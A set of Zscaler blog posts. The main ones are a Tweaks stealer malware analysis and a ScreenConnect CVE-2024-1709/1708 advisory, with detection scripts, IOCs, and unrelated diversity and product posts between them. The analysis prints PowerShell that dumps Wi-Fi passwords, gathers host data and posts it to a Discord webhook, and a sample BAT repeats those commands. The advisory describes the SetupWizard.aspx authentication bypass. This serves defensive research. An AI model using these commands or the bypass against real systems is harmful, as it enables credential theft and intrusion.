Upon further investigation, we discovered that Tweaks was being sold on Discord. Two versions are available for purchase: the Beta Menu and the Paid Menu. The malware author converted the BAT file into an EXE file and then inserted the EXE file into a password-protected ZIP archive, a common way to keep the payload out of reach of gateway and mail scanners that cannot open encrypted archives. This new iteration employs the same stealing capabilities as the BAT file discussed in Case Study 1. The figure below illustrates the Tweaks attack chain for Case Study 2.
Figure 4: The Tweaks attack chain involving a Discord group supplying an EXE file inside a ZIP archive.

Capabilities

The Tweaks malware can steal the following data:
- User's Wi-Fi profiles and passwords
- UUID and usernames
- User location
- IP address and time
- System information
- Roblox ID and in-game currency information

Technical Analysis

The following analysis covers the technical characteristics of Case Study 1 and Case Study 2 for Tweaks.

Case Study 1

1. BAT file establishes webhooks: Once the user downloads the BAT file and executes it, the malware builds the Discord webhook request using the PowerShell commands below. The quoted fragments are passed from the BAT file to a single powershell.exe command line; the trailing caret (^) is cmd's line-continuation character.

    "$payload = [PSCustomObject]@{ embeds = @($embedObject) };" ^
    "Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"

The file embeds the pilfered data within the webhook payload, ensuring its transmission to the attackers.

2. Wi-Fi profile and password theft: The malware steals Wi-Fi profiles and passwords with the PowerShell command below. It enumerates the saved profiles with netsh wlan show profiles, then reads each profile with key=clear, which returns the stored passphrase in plaintext.

    "$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' | ForEach-Object { $_.ToString().Split(':')[1].Trim() }; if ($pwd) { Write-Output ('SSID: ' + $ssid + ', Password: ' + $pwd) } else { Write-Output 'SSID: ' + $ssid + ', Password: NO PASSWORDS FOUND' } });"

The code sample above is also shown in Figure 5 below.

Figure 5: Tweaks code showing the webhook setup and Wi-Fi profiles/password theft.

3. Using WMI to harvest system information: The malware leverages Windows Management Instrumentation (WMI) to collect the hardware UUID and the username, and queries ipinfo.io for the user's location, including the following fields: country, region, city, and approximate coordinates.
The PowerShell code looks like this:

    "$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);" ^
    "$pcUsername = $env:USERNAME;" "$ipInfo = Invoke-RestMethod -Uri 'http://ipinfo.io/json';" ^
    "$country = $ipInfo.country;" ^
    "$region = $ipInfo.region;" ^
    "$city = $ipInfo.city;" ^
    "$location = $ipInfo.loc;"

The code sample above, along with the user's location and username, is shown in Figure 6 below.

Figure 6: Tweaks code showing the theft of UUID, user name, and the user's location.

4. Additional data theft: In addition, the malware collects the private and public IP addresses, the current time, system information, the Roblox ID, and in-game currency information. The IP addresses and current time are collected using the following PowerShell code:

    "$publicIp = (Invoke-RestMethod -Uri 'https://api64.ipify.org?format=json').ip;" ^
    "$privateIp = (Test-Connection -ComputerName $env:COMPUTERNAME -Count 1).IPV4Address.IPAddressToString;" ^
    "$currentTime = Get-Date -Format 'yyyy-MM-dd HH:mm:ss';" ^
    "$description = 'Public IP: ' + $publicIp + ' - Private IP: ' + $privateIp + ' - Current Time: ' + $currentTime;"

The system information, Roblox ID, and currency details are collected with the code shown in Figure 7 below.

Figure 7: Tweaks code showing the collection of system information, Roblox ID, and in-game currency details.

Case Study 2

In Case Study 2, when the user follows the link mentioned in the Discord group, a ZIP archive is downloaded, which contains an EXE file.
Once the user executes the EXE file, it displays the Tweaks menu interface similar to Case Study 1. The malware creates a randomly named folder in the Temp directory (in this run, C:\Users\<user_name>\AppData\Local\Temp\F9B9.tmp) and writes a BAT file into that directory, as shown in the screenshot below.

Figure 8: The process tree of the Tweaks EXE file.

The source code of the dropped BAT file is similar to the BAT file used in Case Study 1 and its functionality is the same.

Conclusion

Attackers are leveraging popular community platforms, like YouTube and Discord, to distribute Tweaks malware and steal sensitive data. They capitalize on the legitimate reputation of YouTube and Discord communities to trick victims into inadvertently downloading (and in some cases paying for) their own malware infections. To mitigate these risks, Roblox users (and all gamers) should prioritize using legitimate apps from reputable and secure sources, thereby avoiding unknown or unverified application origins. By adhering to these precautions, gamers can enhance their cybersecurity defenses and protect themselves from potential malware threats.

Zscaler Sandbox Coverage

During our investigation of this campaign, the Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Through the sandbox analysis, threat scores and the specific MITRE ATT&CK techniques triggered were identified.
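Turning the behaviours documented in the technical analysis above into a static triage check, as an added example that is not part of the ThreatLabz write-up: the script below scans the text of a BAT/PowerShell file for the Wi-Fi key dump via netsh, the WMI UUID query, the ipinfo.io and ipify lookups, and the Invoke-RestMethod post to a Discord webhook, and extracts any webhook URL as a defanged IOC. The two sample scripts are constructed for this example (the webhook ID and token are made up), and the function names are mine. A file is flagged only when it both collects host data and carries a webhook to send it to, so a script that merely posts to a Discord webhook is not treated as a stealer.

```python
"""Static triage for Tweaks-style BAT/PowerShell stealers (added example).

Flags the behaviours the analysis documents (Discord webhook exfiltration,
Wi-Fi key dumping via netsh, WMI UUID collection, ipinfo.io / ipify lookups)
and extracts webhook URLs as defanged IOCs. The samples are constructed,
not the real Tweaks files.
"""
import json
import re

# Constructed stand-in for the Tweaks BAT file: the same commands the
# analysis describes, with a made-up webhook ID and token.
SAMPLE_BAT = r'''@echo off
title Tweaks FPS Booster
powershell -NoProfile -Command ^
"$webHookUrl = 'https://discord.com/api/webhooks/123456789012345678/constructed-sample-token_x';" ^
"$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $ssid = $_.ToString().Split(':')[1].Trim(); (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' });" ^
"$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);" ^
"$ipInfo = Invoke-RestMethod -Uri 'http://ipinfo.io/json';" ^
"$publicIp = (Invoke-RestMethod -Uri 'https://api64.ipify.org?format=json').ip;" ^
"$payload = [PSCustomObject]@{ embeds = @($embedObject) };" ^
"Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"
'''

# Constructed benign "FPS tweak": registry and power-plan changes only,
# nothing collected and nothing sent anywhere.
BENIGN_BAT = r'''@echo off
reg add "HKCU\Software\Microsoft\GameBar" /v AllowAutoGameMode /t REG_DWORD /d 1 /f
powercfg /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
'''

# Discord webhook URL: capture the numeric webhook ID and the token.
WEBHOOK_RE = re.compile(
    r"https?://(?:discord|discordapp)\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)", re.I)

# behaviour name -> pattern over the script text; each BAT fragment is one line
BEHAVIOURS = {
    # netsh wlan show profile ... key=clear dumps the stored passphrase
    "wifi_credential_dump": re.compile(
        r"netsh\s+wlan\s+show\s+profile\b[^\n]*\bkey\s*=\s*clear", re.I),
    # hardware UUID via WMI, used as a victim identifier
    "wmi_hardware_id": re.compile(r"Get-WmiObject\s+win32_computersystemproduct", re.I),
    "geolocation_lookup": re.compile(r"ipinfo\.io/json", re.I),
    "public_ip_lookup": re.compile(r"api64\.ipify\.org", re.I),
    # POST of a variable-held URL with a body: the webhook send itself
    "discord_webhook_post": re.compile(r"Invoke-RestMethod\s+-Uri\s+\$\w+\s+-Body\b", re.I),
}

# Behaviours that gather victim data, as opposed to the sending step.
COLLECTION = {"wifi_credential_dump", "wmi_hardware_id",
              "geolocation_lookup", "public_ip_lookup"}


def defang(url: str) -> str:
    """discord.com -> discord[.]com so the IOC cannot be clicked by accident."""
    host, sep, rest = url.partition("/api/")
    return host.replace(".", "[.]") + sep + rest


def triage(script: str) -> dict:
    """Return the matched behaviours and any webhook URLs found in the script."""
    behaviours = sorted(name for name, rx in BEHAVIOURS.items() if rx.search(script))
    webhooks = [{"id": m.group(1), "defanged": defang(m.group(0))}
                for m in WEBHOOK_RE.finditer(script)]
    if webhooks:
        behaviours.append("discord_webhook_url")
    return {"behaviours": behaviours, "webhooks": webhooks}


def is_suspicious(script: str) -> bool:
    """Stealer signature: collects host data AND has a Discord webhook to send it to.
    A webhook alone (a game-server notifier) or a lookup alone is not enough."""
    result = triage(script)
    return bool(result["webhooks"]) and bool(set(result["behaviours"]) & COLLECTION)


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_BAT), indent=2))
    print("sample suspicious:", is_suspicious(SAMPLE_BAT))
    print("benign suspicious:", is_suspicious(BENIGN_BAT))
```

Run the file directly to print the triage of the constructed sample, or pass the contents of a dropped BAT (for Case Study 2, the file written under the Temp directory) to triage(); the webhook ID it returns is the part of the URL worth blocking and reporting, since the token alone changes when the attacker rotates it.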
Figure 9: Sandbox report

Zscaler detections: Win32.PWS.TWEAKS, BAT.PWS.TWEAKS

MITRE ATT&CK Techniques

ID           Technique Name
T1566        Phishing
T1082        System Information Discovery
T1064        Scripting
T1010        Application Window Discovery
T1047        Windows Management Instrumentation
T1016.002    Wi-Fi Discovery
T1016        System Network Configuration Discovery
T1059        Command and Scripting Interpreter
T1018        Remote System Discovery
T1562.001    Impair Defenses: Disable or Modify Tools

Indicators Of Compromise (IOCs)

MD5                                 File Type
e35864892846be3462139f9534d5ddb5    EXE
0e8d32259b06ab01cd04587b1ae5d0c1    BAT

Webhook URLs
https://discord[.]com/api/webhooks/1193562861071511683/Y3e960iiIYKeT-2hq8c0VDuprdKTD3u5F1f0AKfPQnQde8CoXnK2HzVoVGb6mBgXTsc6
https://discordapp[.]com/api/webhooks/1197341553404956752/xoPYo_fCPQGLsUIBrreFz05R9JuX_K4L96ResReZ7oLtj1za6QSYlCuMnTB8raMpVqCw

YouTube Channels
https://www.youtube[.]com/@cartistweaks/videos
https://www.youtube[.]com/@fraidtweaks

Tue, 12 Mar 2024 14:52:56 -0700 Preet Kamal https://www.zscaler.com/blogs/security-research/tweaks-stealer-targets-roblox-users-through-youtube-and-discord

To Help Build a More Inclusive Future, Develop Yourself https://www.zscaler.com/blogs/zscaler-life/help-build-more-inclusive-future-develop-yourself

An organization's success comes down to its people, and fostering diversity in the workforce amplifies a business's ability to navigate complex challenges. Women bring unique skills and perspectives that contribute significantly to a company's effectiveness. From innovation and effective communication to adept problem-solving and inspiring leadership, women enrich the professional landscape with a diverse array of talents. I am proud to be the global president of WIZE (Women in Zscaler Engage), Zscaler's women-led employee resource group. This week we kicked off our month-long celebration for Women's History Month and International Women's Day. We are continuing to engage in tough conversations both regionally and globally with our allies to elevate women's voices.
There is still a great amount of work that must be done both today and for future generations of women and girls. As Kavitha Mariappan, EVP, Customer Experience & Transformation and WIZE executive sponsor said in her opening remarks at our IWD celebration, “You all are role models to so many in our industry. This is important. Studies show Gen Z girls are 20 percent more likely than boys to say they won’t pursue a STEM career because they don’t feel they would be good at it.”

As a woman in tech and mother of five, stats like this push me to expose girls to the importance of STEM and encourage our allies to use their voices. We need everyone involved in this effort!

Dr. Gena Cox joined us for our virtual celebrations to share her valuable insights on spearheading inclusion within the organization and the significance of respect, with an emphasis on those who are underrepresented. Dr. Cox shared her model on how everyone should feel valued, seen and heard. As I reflected on Dr. Cox’s keynote, I thought about ways I can, and should, be modeling respect in my professional and personal life. What could I do or say to impact someone’s day, life, or career? We all have a voice and platform, we just need to be shown how and when to use it.

I am standing up for women’s rights, for equality in the tech industry, and as a mother I will always stand behind my children and seek to positively impact their future. I believe that, in 2024, we are another step closer to creating a more inclusive environment for future generations, and each individual act matters. This doesn’t just mean in our professional careers, it means taking it into our personal lives.

I am invested in myself. I am dedicated to my personal growth and self-improvement to create the best version of myself.

I am invested in my children and my family. As a working mother, I am continuously learning to skillfully balance the demands of my professional career while being active in my children’s lives.
I am committed to showing each of them that they are valued, heard, seen, and loved.

I am invested in my community. I am passionate about community engagement in my personal and professional lives. I will continue to empower others and reinforce among allies the importance of collaboration through education while leading by example.

Zscaler’s WIZE International Women’s Day celebration also recognized 28 women from around the world with a WIZE Award for their commitment and dedication to making an inclusive workplace through mentorship, community engagement, leadership, going the extra mile, and serving our customers. Thank you to all of our winners and our greater WIZE community for your continued support and efforts to create a safe environment where we can bring our authentic self to work.

We hope you join us in celebrating Women’s History Month and International Women’s Day 2024! To learn more about the amazing women of Zscaler, watch this video and explore the content below:

What to Read Next:
This International Women’s Day, let’s pull up a chair for all of our women colleagues
The ascendency of inclusion: A conversation with Dr. Gena Cox
Celebrating Women at Zscaler: WIZE Woman of Impact in APJ: Sandra Wang
WIZE Women of Impact: Wendy Bartijn

Sun, 10 Mar 2024 17:24:56 -0700 Julia Cummings https://www.zscaler.com/blogs/zscaler-life/help-build-more-inclusive-future-develop-yourself

Outpace Attackers with AI-Powered Advanced Threat Protection
https://www.zscaler.com/blogs/product-insights/outpace-attackers-ai-powered-advanced-threat-protection

Securing access to the internet and applications for any user, device, or workload connecting from anywhere in the world means preventing attacks before they start.
Zscaler Advanced Threat Protection (ATP) is a suite of AI-powered cyberthreat and data protection services included with all editions of Zscaler Internet Access (ZIA) that provides always-on defense against complex cyberattacks, including malware, phishing campaigns, and more. Leveraging real-time AI risk assessments informed by threat intelligence that Zscaler harvests from more than 500 trillion daily signals, ATP stops advanced phishing, command-and-control (C2) attacks, and other tactics before they can impact your organization.

In aggregate, Zscaler operates the largest global security cloud across 150 data centers and blocks more than 9 billion threats per day. Additionally, our platform consumes more than 40 industry threat intelligence feeds for further analysis and threat prevention.

With ATP you can:
- Allow, block, isolate, or alert on web pages based on AI-determined risk scores
- Block malicious content, files, botnet, and C2 traffic
- Stop phishing, spyware, cryptomining, adware, and webspam
- Prevent data loss via IRC or SSH tunneling and C2 traffic
- Block cross-site scripting (XSS) and P2P communications to prevent malicious code injection and file downloads

To provide this protection, Zscaler inspects traffic, encrypted or unencrypted, to block attackers’ attempts to compromise your organization. Zscaler ThreatLabz found in 2023 that 86% of threats are now delivered over encrypted channels, underscoring the need to thoroughly inspect all traffic.

Enabling protection against these threats takes just a few minutes in ATP in the Zscaler Internet Access management console. This blog will help you better understand the attack tactics ATP prevents on a continuous basis. We recommend you select “Block” for all policy options and set the "Suspicious Content Protection" risk tolerance setting to "Low" in the ATP configuration panel of the ZIA management console.
Prevent web content from compromising your environment

Threat actors routinely embed malicious scripts and applications on legitimate websites they’ve hacked. ATP policy protects your traffic from fraud, unauthorized communication, and other malicious objects and scripts. To bolster your organization's web security, the Zscaler ATP service identifies these objects and prevents them from downloading unwanted files or scripts onto an endpoint device via the user’s browser.

Using multidimensional machine learning models, the ZIA service applies inline AI analysis to examine both a web page URL and its domain to create Page Risk and Domain Risk scores. Given the magnitude of Zscaler’s dataset and threat intelligence inputs, risk scoring is not dependent on specific indicators of compromise (IOCs) or patterns. Using AI/ML to analyze web pages reveals malicious content including injected scripts, vulnerable ActiveX, and zero-pixel iFrames. The Domain Risk score results from analysis of the contextual data of a domain, including hosting country, domain age, and links to high-risk top-level domains.

The Page Risk and Domain Risk scores are then combined to produce a single Page Risk score in real time, which is displayed on a sliding scale. This risk score is then evaluated against the Page Risk value you set in the ATP configuration setting (as shown below). Zscaler will block users from accessing all web pages with a Page Risk score higher than the value you set. You can set the Page Risk value based on your organization’s risk tolerance.

Disrupt automated botnet communication

A botnet is a group of internet-connected devices, each of which runs one or more bots, or small programs, that are collectively used for service disruption via distributed denial-of-service (DDoS) attacks, theft of financial or sensitive information, spam campaigns, or brute-forcing systems. The threat actor controls the botnet using command-and-control software.
Command & Control Servers

An attacker uses a C2 server to send instructions to systems compromised by malware and retrieve stolen data from victim devices. Enabling this ATP policy blocks communication to known C2 servers, which is key to preventing attackers from communicating with malicious software deployed on victims’ devices.

Command & Control Traffic

This refers to botnet traffic that sends or receives commands to and from unknown servers. The Zscaler service examines the content of requests and responses to unknown servers. Enabling this control in the ATP configuration blocks this traffic.

Block malicious downloads and browser exploits

Malicious Content & Sites

Websites that attempt to download dangerous content to the user's browser upon loading a page introduce considerable risk: this content can be downloaded silently, without the user's knowledge or awareness. Malicious content could include exploit kits, compromised websites, and malicious advertising.

Vulnerable ActiveX Controls

An ActiveX control is a software program for Internet Explorer, often referred to as an add-on, that performs specific functionality after a web page loads. Threat actors can use ActiveX controls to masquerade as legitimate software when, in reality, they use them to infiltrate an organization’s environment.

Browser Exploits

Known web browser vulnerabilities can be exploited, including exploits targeting Internet Explorer and Adobe Flash. Despite Adobe sunsetting the browser-based add-on in January 2021, Flash components are still found embedded in systems, some of which may be critical for infrastructure or data center operations.

Foil digital fraud and cryptomining attempts

AI-Powered Phishing Detection

Phishing is becoming harder to stop with new tactics, including phishing kits sold on the black market; these kits enable attackers to spin up phishing campaigns and malicious web pages that can be updated in a matter of hours.
Phishing pages trick users into submitting their credentials, which attackers use in turn to compromise victims’ accounts. Phishing attacks remain problematic because even unsophisticated criminals can simply buy kits on the dark web. Threat actors can also update phishing pages more quickly than most security solutions meant to detect and prevent phishing can keep up with. But with Zscaler ATP, you can prevent compromises from patient zero phishing pages inline with advanced AI-based detection.

Known Phishing Sites

Phishing websites mimic legitimate banking and financial sites to fool users into thinking they can safely submit account numbers, passwords, and other personal information, which criminals can then use to steal their money. Enable this policy to prevent users from visiting known phishing sites.

Suspected Phishing Sites

Zscaler can inspect a website’s content for indications that it is a phishing site, and then use AI to stop phishing attack vectors. As part of a highly commoditized attack method, phishing pages can have a lifespan of a few hours, yet most phishing URL feeds lag 24 hours behind; that gap can only be addressed by a capability able to stop both new and unknown phishing attacks.

Spyware Callback

Adware and spyware sites gather users’ information without their knowledge and sell it to advertisers or criminals. When “Spyware Callback” blocking is enabled, Zscaler ATP prevents spyware from calling home and transmitting sensitive user data such as address, date of birth, and credit card information.

Cryptomining

Most organizations block cryptomining traffic to prevent cryptojacking, where malicious scripts or programs secretly use a device to mine cryptocurrency; this malware also consumes resources and impacts the performance of infected machines. Enabling “Block” in ATP’s configuration settings prevents cryptomining from entering your environment via user devices.
Known Adware & Spyware Sites

Threat actors stage legitimate-looking websites designed to distribute potentially unwanted applications (PUA). These web requests can be denied based on the reputation of the destination IP or domain name. Choose “Block” in ATP policy configuration to prevent your users from accessing known adware and spyware sites.

Shut down unauthorized communication

Unauthorized communication refers to the tactics and tools attackers use to bypass firewalls and proxies, such as IRC tunneling applications and "anonymizer" websites.

IRC Tunneling

The Internet Relay Chat (IRC) protocol was created in 1988 to allow real-time text messaging between internet-connected computers. Primarily used in chat rooms (or “channels”), the IRC protocol also supports data transfer as well as server- and client-side commands. While most firewalls block the IRC protocol, they may allow SSH connections. Hackers take advantage of this to tunnel their IRC connections via SSH, bypass firewalls, and exfiltrate data. Enabling this policy option will block IRC traffic from being tunneled over HTTP/S.

SSH Tunneling

SSH tunneling enables sending data with an existing SSH connection, with the traffic tunneled over HTTP/S. While there are legitimate uses for SSH tunnels, bad actors can use them as an evasion technique to exfiltrate data. Zscaler ATP can block this activity.

Anonymizers

Attackers use anonymizer applications to obscure the destination and content they want to access. Anonymizers enable the user to bypass policies that control access to websites and internet resources. Enabling this policy option blocks access to anonymizer sites.

Block cross-site scripting (XSS) and other malicious web requests

Cross-site scripting (XSS) is an attack tactic wherein bad actors inject malicious scripts into otherwise trusted websites. XSS attacks occur when a threat actor uses a web app to send malicious code, usually in the form of a client-side script, to a different end user.
Cookie Stealing

Cookie stealing, or session hijacking, occurs when bad actors harvest session cookies from users’ web browsers so they can gain access to sensitive data including valuable personal and financial details they in turn sell on the dark web or use for identity theft. Attackers also use cookies to impersonate a user and log in to their social media accounts.

Potentially Malicious Requests

Variants of XSS requests enable attackers to exploit vulnerabilities in a web application so they can inject malicious code into a website. When other users load a page from the target web server in their browser, the malicious code executes, expanding the attack exponentially.

Prevent compromise via peer-to-peer file sharing

P2P programs enable users to easily share files with each other over the internet. While there are legitimate uses of P2P file sharing, these tools are also frequently used to illegally acquire copyrighted or protected content, and the same content files can contain malware embedded within legitimate data or programs.

BitTorrent

The Zscaler service can block the usage of BitTorrent, a communication protocol for decentralized file transfers supported by various client applications. While its usage was once pervasive, global torrent traffic has decreased from a high of 35% in the mid-2000s to just 3% of all global internet traffic in 2022.

Tor

Tor is a P2P anonymizer protocol that obscures the destination and content accessed by a user, enabling them to bypass policies controlling what websites or internet resources they can access. With Zscaler ATP, you can block the usage of the Tor protocol.

Avoid VOIP bandwidth overutilization

While convenient for online meetings, video conferencing tools can be bandwidth-intensive. They may also be used to transfer files or other sensitive data. Depending on both your organization's risk tolerance level and overall network performance, you may want to curtail employee or contractor use of Google Hangouts.
Google Hangouts

While VOIP application usage may be encouraged for cost savings over traditional landline-based communications, it’s often associated with high bandwidth usage. Google Hangouts (a.k.a. Google Meet) requires a single video call participant to meet a 3.2 Mbps outbound bandwidth threshold. Inbound bandwidth required starts at 2.6 Mbps for two users and expands with additional participants. In Zscaler ATP, you can block Google Hangouts usage to conserve bandwidth for other business-critical applications.

Comprehensive, always-on, real-time protection

Clearly, there’s a wide swath of protection modern organizations need to fortify their security posture on an ongoing basis. Zscaler Advanced Threat Protection delivers always-on protection against ransomware, zero-day threats, and unknown malware as part of the most comprehensive suite of security capabilities, powered by the world's largest security cloud, all at no extra cost to ZIA customers.

ATP filters and blocks threats directed at ZIA customers and, in combination with Zscaler Firewall and Zscaler Sandbox, provides superior threat prevention thanks to:
- A fully integrated suite of AI-powered security services that closes security gaps and reduces risks left by other vendors’ security tools. Zscaler Sandbox detects zero-day malware for future-proof protection while Zscaler Firewall provides IPS and DNS control and filtering of the latest non-web threats.
- Real-time threat visibility to stay several steps ahead of threat actors. You can’t wait for another vendor’s tool to finish scheduled scans to determine if you’re secure; that puts your organization at risk. Effective advanced threat protection from Zscaler monitors all your traffic at all times.
- Centralized context and correlation that provides the full picture for faster threat detection and prevention. Real-time, predictive cybersecurity measures powered by advanced AI continuously give your IT or security team the ability to outpace attackers.
- The ability to inspect 100% of traffic with Zscaler’s security cloud distributed across 150 points of presence worldwide. Operating as a cloud-native proxy, the Zscaler Zero Trust Exchange ensures that every packet from every user, on or off-network, is fully inspected with unlimited capacity, including all TLS/SSL encrypted traffic.

Learn more about how Zscaler prevents encrypted attacks and best practices to stop encrypted threats by securing TLS/SSL traffic: download a copy of the Zscaler ThreatLabz 2023 State of Encrypted Attacks Report.

Mon, 11 Mar 2024 07:00:01 -0700 Brendon Macaraeg https://www.zscaler.com/blogs/product-insights/outpace-attackers-ai-powered-advanced-threat-protection

Multiple Vulnerabilities Found In ConnectWise ScreenConnect
https://www.zscaler.com/blogs/security-research/multiple-vulnerabilities-found-connectwise-screenconnect

Introduction

On February 19, 2024, ConnectWise released an advisory disclosing critical vulnerabilities impacting ScreenConnect Remote Monitoring and Management (RMM) software. The first vulnerability, tracked as CVE-2024-1709, allows threat actors to bypass authentication and exploit a second vulnerability, CVE-2024-1708. The second vulnerability is a path traversal flaw that enables attackers to upload a malicious file, potentially leading to Remote Code Execution (RCE) on affected versions of ScreenConnect instances. The technical details of this vulnerability underscore its easy exploitability, utilizing common tactics, techniques, and procedures (TTPs) that could lead to data exfiltration and lateral movement across compromised instances.

Recommendations

Zscaler ThreatLabz strongly recommends that on-premises users of ConnectWise ScreenConnect software promptly upgrade to the latest version, which has crucial fixes to mitigate the vulnerabilities identified as CVE-2024-1709 and CVE-2024-1708.
Affected Versions

The following versions of ConnectWise ScreenConnect are affected by the vulnerabilities disclosed and should be updated immediately:
- ScreenConnect 23.9.7 and prior

Background

ConnectWise ScreenConnect enables users to manage, connect, and access systems remotely. The remote access solution is available for on-prem and cloud architectures. ConnectWise’s advisory prompted the Cybersecurity & Infrastructure Security Agency (CISA) to add CVE-2024-1709 to their Known Exploited Vulnerabilities Catalog. CVE-2024-1709 earned a critical CVSS score of 10.0, while CVE-2024-1708 received a score of 8.4.

CVE-2024-1709 allows a remote attacker to gain access to systems with admin privileges. Once inside the compromised system, the attacker leverages CVE-2024-1708 to upload malicious files to the compromised system and potentially achieve RCE.

An attacker can exploit these vulnerabilities to:
- Access, upload, or modify important files
- Steal sensitive information and disrupt critical services
- Move laterally on the breached network

How It Works

The attack sequence begins by sending a malformed HTTP request to the vulnerable ScreenConnect instance. Specifically, this means appending any character to the /SetupWizard.aspx URL (i.e., /SetupWizard.aspx<something>) to gain unauthenticated access to the /SetupWizard.aspx page. The /SetupWizard.aspx page allows the attacker to create a new user account with administrator privileges, even on a pre-configured instance, without requiring any authentication. This exploit is possible due to a flaw in the SetupWizard.aspx file, responsible for the initial administrator setup and license validation on the instance. Once inside the system, the attacker uploads a malicious ASHX ScreenConnect extension, packaged in a ZIP archive, to achieve RCE and later obtain a remote web shell. The attack sequence is shown in Figure 1.

Figure 1: A diagram illustrating how an attacker targets a vulnerable ScreenConnect instance.

Exploitation Steps

1. Malformed HTTP Request: The attacker launches the attack by sending a malformed HTTP request to the vulnerable ScreenConnect instance as shown below.

Figure 2: An example of a malformed HTTP request targeting CVE-2024-1709.

The figure below shows CVE-2024-1709 exploitation via a 302 redirect to the /SetupWizard.aspx page.

Figure 3: Exploitation of CVE-2024-1709.

2. Arbitrary Admin Account Creation: Upon receiving the malicious request, the ScreenConnect instance processes the request and redirects to the /SetupWizard.aspx page, where the attacker can create an administrator account as shown in Figure 4.

Figure 4: The ScreenConnect page where the attacker can fraudulently create an administrator user account.

The figure below includes XML showing that the attacker was able to successfully create an administrator user account.

Figure 5: ScreenConnect\App_Data\User.xml shows evidence of the attacker-created administrator user account.

3. Malicious Payload Delivery: The attacker uploads a malicious ScreenConnect extension (shown in Figure 6) wrapped in a ZIP archive to the vulnerable instance. This ZIP archive contains an ASHX file designed to exploit CVE-2024-1708 and facilitate RCE on the vulnerable system.

Figure 6: A POST transaction depicting the installation of a malicious extension on a ScreenConnect instance.

4. Malicious Code Execution: Following the successful upload of the malicious ScreenConnect extension (.ashx file), the vulnerable system executes the code contained within the payload as shown in Figure 7. This execution grants the attacker unauthorized access and control over the compromised system, enabling further exploitation and privilege escalation.

Figure 7: The malicious ZIP archive uploaded by the attacker containing a Base64-encoded command invoking cmd.exe for remote code execution.

According to reports, the post-exploitation phase included the deployment of ToddlerShark malware, leveraging the second vulnerability.
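The exploitation steps above give defenders one concrete log artifact to hunt for: a request whose path is /SetupWizard.aspx followed by extra characters, reaching a server that finished its setup long ago. The following is an added example, not code from the original post or from ConnectWise, that scans Combined Log Format lines (a constructed format assumption; IIS or reverse-proxy logs differ) for that pattern, normalising percent-encoding and case first so trivial variations are not missed. The sample log lines, IP addresses and timestamps are constructed.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional
from urllib.parse import unquote, urlsplit

# Combined Log Format, e.g. from a reverse proxy in front of ScreenConnect.
# Assumption: adjust this regex if your web server logs a different layout.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Lower-cased because the comparison is done on a normalised path.
SETUP_WIZARD = "/setupwizard.aspx"


@dataclass
class Finding:
    src: str
    ts: str
    method: str
    path: str
    status: int
    reason: str


def normalise_path(target: str) -> str:
    """Strip the query string, decode percent-encoding and lower-case the path,
    so '/SetupWizard.aspx%2Fx' and '/setupwizard.aspx/' compare equal."""
    return unquote(urlsplit(target).path).lower()


def classify_request(line: str) -> Optional[Finding]:
    """Return a Finding for requests touching SetupWizard.aspx, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable line; a real pipeline would count these
    path = normalise_path(m.group("target"))
    if path == SETUP_WIZARD:
        # Only legitimate during first-time setup; on a configured instance
        # this indicates the wizard was reachable and should be reviewed.
        reason = "direct SetupWizard.aspx access on a configured instance"
    elif path.startswith(SETUP_WIZARD):
        # The CVE-2024-1709 pattern described above: SetupWizard.aspx with
        # trailing characters appended to the path.
        reason = "SetupWizard.aspx with trailing characters (CVE-2024-1709 pattern)"
    else:
        return None
    return Finding(m.group("src"), m.group("ts"), m.group("method"),
                   path, int(m.group("status")), reason)


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run classify_request over every line and keep the hits."""
    return [f for f in (classify_request(l) for l in lines) if f is not None]


def summarise(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per source address, to prioritise which hosts to triage."""
    return dict(Counter(f.src for f in findings))


# Constructed sample access log: one benign login, a bypass attempt followed by
# wizard access and an account-creation POST from the same source, one benign
# request, and a percent-encoded variant from a second source.
SAMPLE_LOG = """\
203.0.113.10 - - [20/Feb/2024:10:01:02 +0000] "GET /Login HTTP/1.1" 200 5120
203.0.113.10 - - [20/Feb/2024:10:01:09 +0000] "GET /SetupWizard.aspx/ HTTP/1.1" 302 0
203.0.113.10 - - [20/Feb/2024:10:01:10 +0000] "GET /SetupWizard.aspx HTTP/1.1" 200 9120
203.0.113.10 - - [20/Feb/2024:10:01:40 +0000] "POST /SetupWizard.aspx HTTP/1.1" 302 0
198.51.100.7 - - [20/Feb/2024:10:02:00 +0000] "GET /Host HTTP/1.1" 200 3310
198.51.100.7 - - [20/Feb/2024:10:02:31 +0000] "GET /setupwizard.aspx%2fx HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"{h.ts} {h.src} {h.method} {h.path} {h.status}: {h.reason}")
    print("per-source counts:", summarise(hits))
```

A match is a reason to check ScreenConnect\App_Data\User.xml (Figure 5) for unexpected administrator accounts and to confirm the instance is on 23.9.8 or later.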
ToddlerShark malware demonstrates polymorphic behavior and utilizes legitimate Microsoft binaries and alternate data streams. It bears a striking resemblance to BabyShark malware, which has been associated with the North Korean APT group known as Kimsuky.

Zscaler Best Practices

- Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with advanced Deception turned on.
